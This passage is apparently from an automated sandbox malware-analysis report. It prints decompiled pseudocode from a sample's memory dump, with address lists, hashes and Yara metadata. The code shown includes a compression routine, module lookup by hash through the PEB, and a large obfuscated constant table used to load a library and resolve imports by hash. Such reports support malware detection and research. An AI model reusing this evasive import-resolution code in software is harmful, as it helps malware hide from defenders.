                  • Instruction Fuzzy Hash: BAC012B055020CBFE614CB40DD0AFBAB7ACD744B05F404198BD0462281E6B15E0055B1
                  Uniqueness

                  Uniqueness Score: 0.02%

                  Function 0040436D, Relevance: .3, Instructions: 303COMMONCrypto
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0040436D(intOrPtr* __ecx) {
				char _v5;
				intOrPtr _v12;
				intOrPtr* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _t155;
				signed int _t161;
				void* _t167;
				signed int _t178;
				void* _t189;
				signed int _t192;
				signed int _t203;
				signed char _t213;
				signed int _t217;
				signed char _t219;
				signed int _t220;
				intOrPtr _t224;
				intOrPtr _t226;
				signed int _t228;
				signed int _t231;
				intOrPtr _t234;
				void* _t236;
				intOrPtr* _t240;
				intOrPtr _t243;
				intOrPtr _t244;
				signed int _t250;
				intOrPtr* _t253;
				intOrPtr* _t257;
				intOrPtr _t258;
				signed int _t260;
				signed int _t264;
				signed int _t267;
				intOrPtr* _t274;
				intOrPtr _t275;
				void* _t276;
				signed int _t277;
				signed int _t279;
				signed int _t281;
				void* _t283;

				_t274 = __ecx;
				_t257 =  *((intOrPtr*)(__ecx + 0x84));
				_t275 =  *((intOrPtr*)(__ecx + 0x88));
				_t155 =  *((intOrPtr*)(__ecx + 0x80));
				_v16 = _t257;
				_v12 = _t275;
				_v24 = _t155;
				L2:
				while(_t275 != 0 || _t155 != 0 &&  *((intOrPtr*)(_t274 + 0x20)) != _t275) {
					_t224 =  *((intOrPtr*)(_t274 + 0x20));
					if( *((intOrPtr*)(_t274 + 0x24)) + _t224 < 2) {
						while(_t275 != 0) {
							if( *((intOrPtr*)(_t274 + 0x20)) >= 0x102) {
								L12:
								_t258 =  *((intOrPtr*)(_t274 + 0x20));
								_t226 =  <  ? 0x8000 - _t258 :  *((intOrPtr*)(_t274 + 0x24));
								 *((intOrPtr*)(_t274 + 0x24)) = _t226;
								if(_v24 != 0 || _t258 >= 0x102) {
									_t217 = 0;
									_t276 = 2;
									_t277 =  !=  ?  *(_t274 + 0x50) : _t276;
									_t161 =  *(_t274 + 0x1c) & 0x00007fff;
									_v28 = 1;
									_v32 = 0;
									_v36 = _t277;
									_v20 = _t161;
									if(( *(_t274 + 8) & 0x00090000) == 0) {
										E00403C52( &_v32, _t274,  *(_t274 + 0x1c), _t226, _t258,  &_v32,  &_v36);
										_t217 = _v32;
										_t283 = _t283 + 0x10;
										_t277 = _v36;
										_t228 = _v20;
										L32:
										if(_t277 != 3 || _t217 < 0x2000) {
											L34:
											if(_t228 == _t217 || ( *(_t274 + 8) & 0x00020000) != 0 && _t277 <= 5) {
												goto L37;
											} else {
												goto L38;
											}
										} else {
											L37:
											_t277 = 0;
											_t217 = 0;
											L38:
											_t260 =  *(_t274 + 0x50);
											if(_t260 == 0) {
												if(_t217 != 0) {
													if( *((intOrPtr*)(_t274 + 0x14)) != 0 || ( *(_t274 + 8) & 0x00010000) != 0 || _t277 >= 0x80) {
														E004042D4(_t274, _t277, _t217);
														L53:
														_t231 = _t277;
														goto L54;
													} else {
														_t178 =  <  ? _t228 : 0x8100;
														L51:
														 *(_t274 + 0x54) =  *(_t178 + _t274 + 0x90) & 0x000000ff;
														 *((intOrPtr*)(_t274 + 0x4c)) = _t217;
														 *(_t274 + 0x50) = _t277;
														L46:
														_t231 = _v28;
														L54:
														 *(_t274 + 0x1c) =  *(_t274 + 0x1c) + _t231;
														 *((intOrPtr*)(_t274 + 0x20)) =  *((intOrPtr*)(_t274 + 0x20)) - _t231;
														_t167 =  *((intOrPtr*)(_t274 + 0x24)) + _t231;
														_t233 =  <  ? _t167 : 0x8000;
														 *((intOrPtr*)(_t274 + 0x24)) =  <  ? _t167 : 0x8000;
														_t234 =  *((intOrPtr*)(_t274 + 0x28));
														if(_t234 > _t274 + 0x1926a) {
															L58:
															_t275 = _v12;
															 *((intOrPtr*)(_t274 + 0x84)) = _v16;
															 *((intOrPtr*)(_t274 + 0x88)) = _t275;
															_t236 = E004037A9(_t274, 0);
															if(_t236 != 0) {
																return 0 | _t236 > 0x00000000;
															}
															_t155 = _v24;
															L1:
															_t257 = _v16;
															goto L2;
														}
														_t275 = _v12;
														_t155 = _v24;
														if( *((intOrPtr*)(_t274 + 0x3c)) <= 0x7c00) {
															goto L1;
														}
														if((_t234 - _t274 - 0x9272) * 0x73 >> 7 >=  *((intOrPtr*)(_t274 + 0x3c))) {
															goto L58;
														}
														_t155 = _v24;
														if(( *(_t274 + 8) & 0x00080000) == 0) {
															goto L1;
														}
														goto L58;
													}
												}
												_t181 =  <  ? _t228 : 0x8100;
												E004042A2(_t274,  *((intOrPtr*)(( <  ? _t228 : 0x8100) + _t274 + 0x90)));
												goto L46;
											}
											_t240 = _t274;
											if(_t277 <= _t260) {
												E004042D4(_t240, _t260,  *((intOrPtr*)(_t274 + 0x4c)));
												_t231 =  *(_t274 + 0x50) - 1;
												 *(_t274 + 0x50) =  *(_t274 + 0x50) & 0x00000000;
												goto L54;
											}
											E004042A2(_t240,  *(_t274 + 0x54));
											if(_t277 < 0x80) {
												_t178 = _v20;
												goto L51;
											}
											E004042D4(_t240, _t277, _t217);
											 *(_t274 + 0x50) =  *(_t274 + 0x50) & 0x00000000;
											goto L53;
										}
									}
									_t228 = _t161;
									if(_t226 != 0 && ( *(_t274 + 8) & 0x00080000) == 0) {
										_t277 = 0;
										_v5 =  *((intOrPtr*)((_t228 - 0x00000001 & 0x00007fff) + _t274 + 0x90));
										if(_t258 == 0) {
											L30:
											_t277 = 0;
											goto L34;
										}
										_t189 = _t228 + _t274;
										_t243 = _v5;
										while( *((intOrPtr*)(_t189 + _t277 + 0x90)) == _t243) {
											_t277 = _t277 + 1;
											if(_t277 < _t258) {
												continue;
											}
											break;
										}
										_t228 = _v20;
										if(_t277 < 3) {
											goto L30;
										}
										_t217 = 1;
									}
									goto L32;
								} else {
									_t257 = _v16;
									goto L61;
								}
							}
							_t219 =  *_t257;
							_t192 =  *(_t274 + 0x1c) +  *((intOrPtr*)(_t274 + 0x20)) & 0x00007fff;
							_t257 = _t257 + 1;
							_t275 = _t275 - 1;
							_v16 = _t257;
							_v12 = _t275;
							 *(_t192 + _t274 + 0x90) = _t219;
							if(_t192 < 0x101) {
								 *(_t192 + _t274 + 0x8090) = _t219;
							}
							 *((intOrPtr*)(_t274 + 0x20)) =  *((intOrPtr*)(_t274 + 0x20)) + 1;
							_t244 =  *((intOrPtr*)(_t274 + 0x20));
							if( *((intOrPtr*)(_t274 + 0x24)) + _t244 >= 3) {
								_t279 =  *(_t274 + 0x1c) + _t244 + 0xfffffffd;
								_t264 = _t279 & 0x00007fff;
								_t250 = (( *(_t264 + _t274 + 0x90) & 0x000000ff) << 0x0000000a ^ _t219 & 0x000000ff) & 0x00007fff ^ ( *((_t279 + 0x00000001 & 0x00007fff) + _t274 + 0x90) & 0xff) << 0x00000005;
								 *((short*)(_t274 + 0x19272 + _t264 * 2)) =  *(_t274 + 0x29272 + _t250 * 2);
								_t257 = _v16;
								 *(_t274 + 0x29272 + _t250 * 2) = _t279;
								_t275 = _v12;
							}
						}
						goto L12;
					}
					_t203 =  *(_t274 + 0x1c) + _t224;
					_t281 = _t203 & 0x00007fff;
					_t220 = _t203 - 2;
					_t267 = ( *((_t220 & 0x00007fff) + _t274 + 0x90) & 0x000000ff) << 0x00000005 ^  *((_t220 + 0x00000001 & 0x00007fff) + _t274 + 0x90) & 0x000000ff;
					_t211 =  <  ? _v12 : 0x102 - _t224;
					_v12 = _v12 - 0x102;
					_t212 = ( <  ? _v12 : 0x102 - _t224) +  *((intOrPtr*)(_t274 + 0x20));
					_v28 = _v16 + 0x102;
					 *((intOrPtr*)(_t274 + 0x20)) = ( <  ? _v12 : 0x102 - _t224) +  *((intOrPtr*)(_t274 + 0x20));
					while(1) {
						_t253 = _v16;
						if(_t253 == _v28) {
							break;
						}
						_t213 =  *_t253;
						_v16 = _t253 + 1;
						 *(_t274 + _t281 + 0x90) = _t213;
						if(_t281 < 0x101) {
							 *(_t281 + _t274 + 0x8090) = _t213;
						}
						_t267 = (_t267 << 0x00000005 ^ _t213 & 0x000000ff) & 0x00007fff;
						_t281 = _t281 + 0x00000001 & 0x00007fff;
						 *((short*)(_t274 + 0x19272 + (_t220 & 0x00007fff) * 2)) =  *(_t274 + 0x29272 + _t267 * 2);
						 *(_t274 + 0x29272 + _t267 * 2) = _t220;
						_t220 = _t220 + 1;
					}
					_t275 = _v12;
					goto L12;
				}
				L61:
				 *((intOrPtr*)(_t274 + 0x84)) = _t257;
				 *((intOrPtr*)(_t274 + 0x88)) = _t275;
				return 1;
			}













































                  0x00404376
                  0x00404378
                  0x0040437e
                  0x00404384
                  0x0040438a
                  0x0040438d
                  0x00404390
                  0x00000000
                  0x00404398
                  0x004043b0
                  0x004043b8
                  0x004045c5
                  0x00404527
                  0x0040446d
                  0x0040446d
                  0x0040447c
                  0x00404483
                  0x00404486
                  0x00404497
                  0x0040449e
                  0x0040449f
                  0x004044a3
                  0x004044af
                  0x004044b6
                  0x004044b9
                  0x004044bc
                  0x004044bf
                  0x004045e5
                  0x004045ea
                  0x004045ed
                  0x004045f0
                  0x004045f3
                  0x004045f6
                  0x004045f9
                  0x00404603
                  0x00404605
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00404615
                  0x00404615
                  0x00404615
                  0x00404617
                  0x00404619
                  0x00404619
                  0x0040461e
                  0x0040465e
                  0x00404683
                  0x004046ba
                  0x004046bf
                  0x004046c0
                  0x00000000
                  0x00404696
                  0x0040469f
                  0x004046a2
                  0x004046aa
                  0x004046ad
                  0x004046b0
                  0x0040467a
                  0x0040467a
                  0x004046c2
                  0x004046c2
                  0x004046ca
                  0x004046d0
                  0x004046d6
                  0x004046df
                  0x004046e2
                  0x004046e7
                  0x0040471f
                  0x00404724
                  0x00404729
                  0x0040472f
                  0x0040473a
                  0x0040473e
                  0x00000000
                  0x00404760
                  0x00404740
                  0x00404395
                  0x00404395
                  0x00000000
                  0x00404395
                  0x004046f0
                  0x004046f3
                  0x004046f6
                  0x00000000
                  0x00000000
                  0x0040470d
                  0x00000000
                  0x00000000
                  0x00404716
                  0x00404719
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00404719
                  0x00404683
                  0x00404669
                  0x00404675
                  0x00000000
                  0x00404675
                  0x00404620
                  0x00404624
                  0x0040464c
                  0x00404655
                  0x00404656
                  0x00000000
                  0x00404656
                  0x00404629
                  0x00404634
                  0x00404644
                  0x00000000
                  0x00404644
                  0x00404639
                  0x0040463e
                  0x00000000
                  0x0040463e
                  0x004045f9
                  0x004044c7
                  0x004044c9
                  0x004044df
                  0x004044ed
                  0x004044f2
                  0x004045d2
                  0x004045d2
                  0x00000000
                  0x004045d2
                  0x004044f8
                  0x004044fb
                  0x004044fe
                  0x00404507
                  0x0040450a
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040450a
                  0x0040450c
                  0x00404512
                  0x00000000
                  0x00000000
                  0x0040451a
                  0x0040451a
                  0x00000000
                  0x00404748
                  0x00404748
                  0x00000000
                  0x00404748
                  0x00404486
                  0x00404533
                  0x00404535
                  0x0040453a
                  0x0040453b
                  0x0040453c
                  0x0040453f
                  0x00404542
                  0x0040454e
                  0x00404550
                  0x00404550
                  0x00404557
                  0x0040455d
                  0x00404565
                  0x0040456d
                  0x00404574
                  0x004045a5
                  0x004045af
                  0x004045b7
                  0x004045ba
                  0x004045c2
                  0x004045c2
                  0x00404565
                  0x00000000
                  0x004045cd
                  0x004043c1
                  0x004043c5
                  0x004043cb
                  0x004043f0
                  0x004043ff
                  0x00404403
                  0x00404408
                  0x0040440b
                  0x0040440e
                  0x00404462
                  0x00404462
                  0x00404468
                  0x00000000
                  0x00000000
                  0x00404413
                  0x00404416
                  0x00404419
                  0x00404426
                  0x00404428
                  0x00404428
                  0x0040443e
                  0x00404443
                  0x00404451
                  0x00404459
                  0x00404461
                  0x00404461
                  0x0040446a
                  0x00000000
                  0x0040446a
                  0x0040474b
                  0x0040474d
                  0x00404753
                  0x00000000

                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ae03f3a372626642b1fb26106d35d9b0dbeac125857d4feb9d457580f34e28b3
                  • Instruction ID: e33084252fcec48e949ebcca89b2b69e4ca8ec5097f1102ae8c543975fbc8947
                  • Opcode Fuzzy Hash: ae03f3a372626642b1fb26106d35d9b0dbeac125857d4feb9d457580f34e28b3
                  • Instruction Fuzzy Hash: 4FC1C271B04916ABCB18CE68C4907BAF7F1BF89304F04427ED659A7781D73CA855CB88
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 004012CD, Relevance: .0, Instructions: 23COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E004012CD(void* __ecx) {
				void* _t8;
				intOrPtr* _t12;
				intOrPtr* _t13;

				_t8 = __ecx;
				_t12 =  *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc;
				_t13 =  *_t12;
				while(_t13 != _t12) {
					if(E00401161( *((intOrPtr*)(_t13 + 0x30))) == _t8) {
						return  *((intOrPtr*)(_t13 + 0x18));
					}
					_t13 =  *_t13;
				}
				return 0;
			}






                  0x004012d9
                  0x004012db
                  0x004012de
                  0x004012f0
                  0x004012ec
                  0x00000000
                  0x004012fa
                  0x004012ee
                  0x004012ee
                  0x00000000

                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c4bdfc313c746a2cb64b2d13bd71f69938b88e51a1103363138794cfe1d3b908
                  • Instruction ID: 7ecbe99e9aff7bbd4a6860067150bf6fe1a6c3b143e7c3a6fabfcc45b8fe1074
                  • Opcode Fuzzy Hash: c4bdfc313c746a2cb64b2d13bd71f69938b88e51a1103363138794cfe1d3b908
                  • Instruction Fuzzy Hash: EFE086333104508BC720DA99C480857F3F9EB84370B2908BFE546F7A61C338BC019688
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 00401E04, Relevance: .0, Instructions: 3COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00401E04() {

				return  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
			}



                  0x00401e10

                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 98b478bd1af69a2275d0ab39f1ac079ffe73a0c4551ec61df12d917ad4ecd62f
                  • Instruction ID: dd1ea78877d89c8c1f21003391c56dd86dd10fe21c56db2a52adb93900471d7c
                  • Opcode Fuzzy Hash: 98b478bd1af69a2275d0ab39f1ac079ffe73a0c4551ec61df12d917ad4ecd62f
                  • Instruction Fuzzy Hash: 8EA00275752980CFCE12CB09C394F9073F4F744B41F0504F1E80997A11C238A900CA00
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 00409BFD, Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 199libraryUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 82%
                  			E00409BFD(void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				intOrPtr _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				intOrPtr _v308;
				intOrPtr _v312;
				intOrPtr _v316;
				intOrPtr _v320;
				intOrPtr _v324;
				intOrPtr _v328;
				intOrPtr _v332;
				intOrPtr _v336;
				intOrPtr _v340;
				intOrPtr _v344;
				intOrPtr _v348;
				intOrPtr _v352;
				intOrPtr _v356;
				intOrPtr _v360;
				intOrPtr _v364;
				intOrPtr _v368;
				intOrPtr _v372;
				intOrPtr _v376;
				intOrPtr _v380;
				intOrPtr _v384;
				intOrPtr _v388;
				intOrPtr _v392;
				intOrPtr _v396;
				intOrPtr _v400;
				intOrPtr _v404;
				intOrPtr _v408;
				intOrPtr _v412;
				intOrPtr _v416;
				intOrPtr _v420;
				intOrPtr _v424;
				intOrPtr _v428;
				intOrPtr _v432;
				intOrPtr _v436;
				intOrPtr _v440;
				intOrPtr _v444;
				intOrPtr _v448;
				intOrPtr _v452;
				intOrPtr _v456;
				intOrPtr _v460;
				intOrPtr _v464;
				intOrPtr _v468;
				intOrPtr _v472;
				intOrPtr _v476;
				intOrPtr _v480;
				intOrPtr _v484;
				intOrPtr _v488;
				intOrPtr _v492;
				intOrPtr _v496;
				intOrPtr _v500;
				intOrPtr _v504;
				intOrPtr _v508;
				intOrPtr _v512;
				intOrPtr _v516;
				intOrPtr _v520;
				intOrPtr _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				intOrPtr _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				intOrPtr _v600;
				intOrPtr _v604;
				intOrPtr _v608;
				intOrPtr _v612;
				intOrPtr _v616;
				intOrPtr _v620;
				intOrPtr _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				intOrPtr _v672;
				intOrPtr _v676;
				intOrPtr _v680;
				intOrPtr _v684;
				intOrPtr _v688;
				intOrPtr _v692;
				intOrPtr _v696;
				intOrPtr _v700;
				char _v704;

				_v704 = 0xf893fe23;
				_v700 = 0x96a93579;
				_v696 = 0x245c2aae;
				_v692 = 0xf26b8a8f;
				_v688 = 0x14c1b027;
				_v684 = 0xe0f0703e;
				_v680 = 0x88b3d872;
				_v676 = 0xa84285a9;
				_v672 = 0x47a43a6c;
				_v668 = 0xf852e92a;
				_v664 = 0xe5dfba2e;
				_v660 = 0xd7c59fdb;
				_v656 = 0xc3cbda99;
				_v652 = 0xcb41f718;
				_v648 = 0x6a64f5c4;
				_v644 = 0xdedf71d9;
				_v640 = 0xc4de6aec;
				_v636 = 0xfadcabb3;
				_v632 = 0x51f000a9;
				_v628 = 0x9adea939;
				_v624 = 0xb06b7dbe;
				_v620 = 0x2357ceb6;
				_v616 = 0x35749835;
				_v612 = 0x24a62c8;
				_v608 = 0x5593220e;
				_v604 = 0x3bac3701;
				_v600 = 0x3ed279c7;
				_v596 = 0xc38eec75;
				_v592 = 0xaa787b27;
				_v588 = 0xe66cbef7;
				_v584 = 0x3eba0d2d;
				_v580 = 0x80721929;
				_v576 = 0x647cf0de;
				_v572 = 0x6b060840;
				_v568 = 0xdb744423;
				_v564 = 0x56120815;
				_v560 = 0x16cc448e;
				_v556 = 0xaf1d3a70;
				_v552 = 0x84afcece;
				_v548 = 0x1f5b2bac;
				_v544 = 0x84987065;
				_v540 = 0x923c41c0;
				_v536 = 0x62b2d1f2;
				_v532 = 0x96e98167;
				_v528 = 0x6b9c643e;
				_v524 = 0x3bf32bb7;
				_v520 = 0x926b56ed;
				_v516 = 0xb2212760;
				_v512 = 0x3029804a;
				_v508 = 0x17afbdc1;
				_v504 = 0xe5215b81;
				_v500 = 0xa9a73174;
				_v496 = 0x38362969;
				_v492 = 0x2014a2e5;
				_v488 = 0x9bd1543c;
				_v484 = 0x9f02550a;
				_v480 = 0x70771f01;
				_v476 = 0xf57f7493;
				_v472 = 0xc2432019;
				_v468 = 0xfbc35934;
				_v464 = 0x7eef6c55;
				_v460 = 0xe5a1e850;
				_v456 = 0x95e16117;
				_v452 = 0x24148e16;
				_v448 = 0x7e86f567;
				_v444 = 0xd337dcd3;
				_v440 = 0xf1e0035b;
				_v436 = 0x7c2fa058;
				_v432 = 0xf68afb41;
				_v428 = 0xe89fcfb5;
				_v424 = 0x58132f2e;
				_v420 = 0xeb09708a;
				_v416 = 0x5042b9f5;
				_v412 = 0xa93c3553;
				_v408 = 0x5a85ccd8;
				_v404 = 0xad4d5cb9;
				_v400 = 0x72223e4b;
				_v396 = 0xa39693a8;
				_v392 = 0xef1aadfd;
				_v388 = 0x6cbdb06a;
				_v384 = 0xd7d937f8;
				_v380 = 0x596db643;
				_v376 = 0x230ce0c7;
				_v372 = 0x2d4bd8be;
				_v368 = 0xb37400f3;
				_v364 = 0x76b2403b;
				_v360 = 0xe15bf8ce;
				_v356 = 0xfc854871;
				_v352 = 0x6777c410;
				_v348 = 0xa6813d08;
				_v344 = 0x61441dae;
				_v340 = 0x7bc73fac;
				_v336 = 0xa81f123a;
				_v332 = 0x2f60e4b5;
				_v328 = 0x4165078e;
				_v324 = 0x81b3b60d;
				_v320 = 0x2f424b6a;
				_v316 = 0xe18acee1;
				_v312 = 0x40cb9f46;
				_v308 = 0xdcd07e81;
				_v304 = 0x77d948c4;
				_v300 = 0x8a50f65;
				_v296 = 0x69aaae5c;
				_v292 = 0x9aa1a84c;
				_v288 = 0x1177fe62;
				_v284 = 0x215e105a;
				_v280 = 0x568272bb;
				_v276 = 0x5f8f9ba2;
				_v272 = 0xae54d071;
				_v268 = 0x6814f89b;
				_v264 = 0x256969df;
				_v260 = 0x40871313;
				_v256 = 0x6ce1575a;
				_v252 = 0xbd3d788c;
				_v248 = 0x7ca8f87d;
				_v244 = 0x85fa53e6;
				_v240 = 0xd148325c;
				_v236 = 0x5e7ec80d;
				_v232 = 0xfdf502b7;
				_v228 = 0x2c986a2a;
				_v224 = 0xddbf220;
				_v220 = 0x4615f74b;
				_v216 = 0x5ca4c89f;
				_v212 = 0x146daa39;
				_v208 = 0xc823a9eb;
				_v204 = 0x367ea921;
				_v200 = 0xa498042b;
				_v196 = 0xca2acd0c;
				_v192 = 0xcac29f8f;
				_v188 = 0x581c0af8;
				_v184 = 0x54e383ca;
				_v180 = 0xe1d640da;
				_v176 = 0x26176d9b;
				_v172 = 0x44ba6c41;
				_v168 = 0xc7a769a8;
				_v164 = 0x14207816;
				_v160 = 0x60a483b3;
				_v156 = 0x2ec84207;
				_v152 = 0x55861a6c;
				_v148 = 0x9395ac55;
				_v144 = 0x7b3d468b;
				_v140 = 0xd742a34c;
				_v136 = 0xba1c8499;
				_v132 = 0xeedaef98;
				_v128 = 0x6fb05dd;
				_v124 = 0x51e8e4bc;
				_v120 = 0x78b88ff1;
				_v116 = 0xbd2f7124;
				_v112 = 0x56393da7;
				_v108 = 0xfe67bd5c;
				_v104 = 0x6bdb93e9;
				_v100 = 0xcd10dc31;
				_v96 = 0x10fa8214;
				_v92 = 0x66a75e2c;
				_v88 = 0xd4e5c57c;
				_v84 = 0xd9860dbd;
				_v80 = 0x6c05994b;
				_v76 = 0x3a6c9168;
				_v72 = 0x3ac0a209;
				_v68 = 0xeded3b06;
				_v64 = 0xc4e5c3d3;
				_v60 = 0x7666b774;
				_v56 = 0x18554a2e;
				_v52 = 0x9ba375a9;
				_v48 = 0x4225f3c7;
				_v44 = 0x59ee853;
				_v40 = 0xbef69b19;
				_v36 = 0x369b917b;
				_v32 = 0x5d702853;
				_v28 = 0x77e322b0;
				_v24 = 0x283b69ec;
				_v20 = 0x1e83f9c3;
				_v16 = 0xacacd89d;
				_v12 = 0x5dd1b9f2;
				_v8 = 0xedfd234e;
				_t186 = E00401A52(0x412360, 0x72fc3a35);
				 *0x4164f8 = LoadLibraryW(_t177);
				L00401B09(_t186);
				_push(0x415490);
				_push(0x6ae14ef1);
				return E004012FF( *0x4164f8,  &_v704, 0xaf);
			}


















































































































































































                  0x00409c07
                  0x00409c11
                  0x00409c1b
                  0x00409c25
                  0x00409c2f
                  0x00409c39
                  0x00409c43
                  0x00409c4d
                  0x00409c57
                  0x00409c61
                  0x00409c6b
                  0x00409c75
                  0x00409c7f
                  0x00409c89
                  0x00409c93
                  0x00409c9d
                  0x00409ca7
                  0x00409cb1
                  0x00409cbb
                  0x00409cc5
                  0x00409ccf
                  0x00409cd9
                  0x00409ce3
                  0x00409ced
                  0x00409cf7
                  0x00409d01
                  0x00409d0b
                  0x00409d15
                  0x00409d1f
                  0x00409d29
                  0x00409d33
                  0x00409d3d
                  0x00409d47
                  0x00409d51
                  0x00409d5b
                  0x00409d65
                  0x00409d6f
                  0x00409d79
                  0x00409d83
                  0x00409d8d
                  0x00409d97
                  0x00409da1
                  0x00409dab
                  0x00409db5
                  0x00409dbf
                  0x00409dc9
                  0x00409dd3
                  0x00409ddd
                  0x00409de7
                  0x00409df1
                  0x00409dfb
                  0x00409e05
                  0x00409e0f
                  0x00409e19
                  0x00409e23
                  0x00409e2d
                  0x00409e37
                  0x00409e41
                  0x00409e4b
                  0x00409e55
                  0x00409e5f
                  0x00409e69
                  0x00409e73
                  0x00409e7d
                  0x00409e87
                  0x00409e91
                  0x00409e9b
                  0x00409ea5
                  0x00409eaf
                  0x00409eb9
                  0x00409ec3
                  0x00409ecd
                  0x00409ed7
                  0x00409ee1
                  0x00409eeb
                  0x00409ef5
                  0x00409eff
                  0x00409f09
                  0x00409f13
                  0x00409f1d
                  0x00409f27
                  0x00409f31
                  0x00409f3b
                  0x00409f45
                  0x00409f4f
                  0x00409f59
                  0x00409f63
                  0x00409f6d
                  0x00409f77
                  0x00409f81
                  0x00409f8b
                  0x00409f95
                  0x00409f9f
                  0x00409fa9
                  0x00409fb3
                  0x00409fbd
                  0x00409fc7
                  0x00409fd1
                  0x00409fdb
                  0x00409fe5
                  0x00409fef
                  0x00409ff9
                  0x0040a003
                  0x0040a00d
                  0x0040a017
                  0x0040a021
                  0x0040a02b
                  0x0040a035
                  0x0040a03f
                  0x0040a049
                  0x0040a053
                  0x0040a05d
                  0x0040a067
                  0x0040a071
                  0x0040a07b
                  0x0040a085
                  0x0040a08f
                  0x0040a099
                  0x0040a0a3
                  0x0040a0ad
                  0x0040a0b7
                  0x0040a0c1
                  0x0040a0cb
                  0x0040a0d5
                  0x0040a0df
                  0x0040a0e9
                  0x0040a0f3
                  0x0040a0fd
                  0x0040a107
                  0x0040a111
                  0x0040a11b
                  0x0040a125
                  0x0040a12f
                  0x0040a139
                  0x0040a143
                  0x0040a14d
                  0x0040a157
                  0x0040a161
                  0x0040a16b
                  0x0040a175
                  0x0040a17f
                  0x0040a189
                  0x0040a193
                  0x0040a19d
                  0x0040a1a4
                  0x0040a1ab
                  0x0040a1b2
                  0x0040a1b9
                  0x0040a1c0
                  0x0040a1c7
                  0x0040a1ce
                  0x0040a1d5
                  0x0040a1dc
                  0x0040a1e3
                  0x0040a1ea
                  0x0040a1f1
                  0x0040a1f8
                  0x0040a1ff
                  0x0040a206
                  0x0040a20d
                  0x0040a214
                  0x0040a220
                  0x0040a22c
                  0x0040a233
                  0x0040a23a
                  0x0040a241
                  0x0040a248
                  0x0040a24f
                  0x0040a256
                  0x0040a25d
                  0x0040a264
                  0x0040a26b
                  0x0040a272
                  0x0040a279
                  0x0040a280
                  0x0040a28c
                  0x0040a297
                  0x0040a29c
                  0x0040a2ad
                  0x0040a2b2
                  0x0040a2c8

                  APIs
                  • LoadLibraryW.KERNEL32(00000000), ref: 0040A28F
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
